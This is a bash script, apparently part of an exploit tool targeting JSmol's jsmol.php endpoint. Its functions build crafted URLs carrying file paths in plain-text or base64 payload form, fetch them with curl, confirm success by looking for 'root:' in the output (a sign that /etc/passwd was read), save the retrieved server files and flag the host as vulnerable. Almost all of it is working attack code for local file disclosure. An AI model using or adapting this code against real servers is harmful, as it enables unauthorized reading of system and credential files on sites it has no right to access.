#!/bin/bash
function forgeRequest {
	this_filename="$1"
	this_payloadtype="$2" #txt, b64
	if [ $this_payloadtype = "b64" ] ||  [ $this_payloadtype = "B64" ];then
		this_forged_request="$jsmolphp_url?$payload_b64$this_filename" 
	else
		this_forged_request="$jsmolphp_url?$payload_txt$this_filename" 
	fi
	echo "$this_forged_request"
	}
function sendRequest {
	this_forged_request="$1"
	curl -ks --connect-timeout "$curl_ttl" --retry-max-time "$curl_ttl" "$this_forged_request" -o "$curl_output_filename"
	}
function checkResult {
	this_check=$(cat "$curl_output_filename" 2>/dev/null | grep "root:")
	#this_check=$(cat "$curl_output_filename" 2>&1)
	if [ ${#this_check} -gt 0 ];then
		echo -e "OK"
	else
		echo -e "KO"
	fi
	}

function checkFileSize {
	this_filename="$1"
	this_filesize=$(cat $this_filename 2>/dev/null |wc -c)
	if [ $this_filesize -gt 2 ];then
		echo 'OK'
	else
		echo 'KO'
	fi

	}
function getFile {
	this_filename="$1"
	this_payloadtype="$2" #txt, b64
	this_dest_file="$3"
	this_forged_request=$(forgeRequest "$this_filename" "$this_payloadtype" )
	sendRequest "$this_forged_request" 
	this_check_result=$(checkResult)
	if [ $this_check_result = "OK" ];then
		cat "$curl_output_filename" > "$this_dest_file"
	#else
		#echo -e "    |_[!] ERROR: Can't get file $this_filename!" >&2
	fi
	}
function checkFile {
	this_filename="$1"
	this_payloadtype="$2" #txt, b64
	this_forged_request=$(forgeRequest "$this_filename" "$this_payloadtype" )
	sendRequest "$this_forged_request" 
	this_check_result=$(checkResult)
	if [ $this_check_result = "OK" ];then
		continue_tests='FALSE'
		is_vuln='TRUE'
		functionnal_payload="$this_payloadtype"
	else
		continue_tests='TRUE'
		is_vuln='FALSE'
		functionnal_payload=''
	fi

	}
function showTitle {
	this_label="$1"
	this_msg="$2"
	this_lvl="$3"
	this_nl="$4"
	this_chip=${chips[$this_lvl]}
	this_arbo=${arbo[$this_lvl]}

	if [ ${#this_nl} -gt 0 ];then
		echo -en "$c_main$this_arbo$this_chip $this_label:$c_text $this_msg"
	else
		echo -e  "$c_main$this_arbo$this_chip $this_label:$c_text $this_msg"
	fi
	}
function showBanner {
	echo -e "$c_main"
	banner=$(echo "$banner"|base64 -d)
	l1=$(echo "$banner"|head -n 1 |tail -n 2)
	l2=$(echo "$banner"|head -n 3 |tail -n 1)
	l3=$(echo "$banner"|head -n 4 |tail -n 1)
	l4=$(echo "$banner"|head -n 5 |tail -n 1)
	lasts=$(echo "$banner"|tail -n +6 )
	echo -e "\033[0;31m$l1"
	echo -e "\033[1;31m$l2"
	echo -e "\033[0;33m$l3"
	echo -e "\033[1;33m$l4"
	echo -e "$c_main$lasts"
	echo -e "$c_text         By CHORFA Alla-eddine -  h4ckr213dz@gmail.com$c_reset\n"
	}

